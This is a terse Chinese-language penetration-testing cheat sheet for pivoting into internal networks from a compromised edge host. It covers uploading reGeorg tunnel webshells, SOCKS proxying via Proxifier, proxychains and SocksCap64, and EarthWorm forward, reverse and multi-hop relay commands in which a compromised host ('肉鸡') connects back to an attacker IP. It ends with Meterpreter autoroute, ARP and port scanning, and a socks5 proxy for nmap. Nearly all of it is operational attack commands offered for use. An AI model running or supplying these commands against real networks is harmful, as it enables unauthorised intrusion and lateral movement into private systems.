内网转发和代理,一层代理
reGeorg+proxifier
1,将reGeorg里的对应服务器语言的tunnel文件上传到边沿机,然后访问tunnel文件,提示all seems fine才算成功,成功之后复制url
2,运行python reGeorgSocksProxy.py -u url -p 端口 ,运行之后也提示all seems fine就算准备完成
3,打开proxifier,添加代理服务器,proxy server ,地址127.0.0.1 端口为regeorg设置的端口,使用socks 4
4,打开proxification rules代理规则,选择使用之前添加的代理服务器,direct模式为使用该代理
linux下使用proxychains代理
1,将reGeorg里的对应服务器语言的tunnel文件上传到边沿机,然后访问tunnel文件,提示all seems fine才算成功,成功之后复制url
2,运行python reGeorgSocksProxy.py -u url -p 端口 ,运行之后也提示all seems fine就算准备完成
3,修改/etc/proxychains.conf配置文件,添加代理服务器
格式如下
socket4代理模式 127.0.0.1 1234端口
reGeorg+sockscap64
sockscap64新建代理服务器,设置好之后,添加需要使用代理的程序,运行即可
ew代理,socks协议,
-s 指定链路状态,6种
-l 本地监听的端口
-d 指定转发或者反弹的主机地址
-e 指定转发或者反弹的主机端口
-f 连接或者映射的主机地址
-g 连接或者映射的主机端口
正向代理,肉鸡,ew -s ssocksd -l 1080 需要在目标机中开启一个端口
反向代理,公网Ip的主机,ew -s rcsocks -l 1080 8888 监听端口
肉鸡 ew -s rssocks -d 攻击机ip -e 8888
多级级联
公网ip开通通道 监听通道端口 ew -s lcx_listen -l 1080 -e 8888
靶机执行,ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999,将内网靶机的ip 999端口,映射到1080端口
靶机执行,ew -s lcx_slave -d 攻击机ip -e 8888 -f 2.2.2.3转发的主机ip -g转发的端口 9999 , -f是当前靶机ip也可以是内网中其他主机的ip
三级级联
ew -s rcsocks -l 1080 -e 8888
ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
ew -s lcx_listen -l 9999 -e 7777
ew -s rssocks -d 127.0.0.1 -e 7777
meterpreter内网渗透
1,获得边沿机session之后,首先收集信息,如ip地址,看网段,之后设置路由,run autoroute -s 10.10.10.0/24 , run post/multi/manage/autoroute 自动设置路由
2,扫描内网机器,ip扫描和端口扫描,run post/windows/gather/arp_scanner rhosts=10.10.10.0/24,run arp_scanner -r 10.10.10.0/24, 扫端口use auxiliary/scanner/portscan/tcp
3,设置代理,use auxiliary/server/socks5 ,配置代理软件vim /etc/proxychains.conf,添加代理服务器和端口,然后使用proxychains nmap 来尝试扫描探测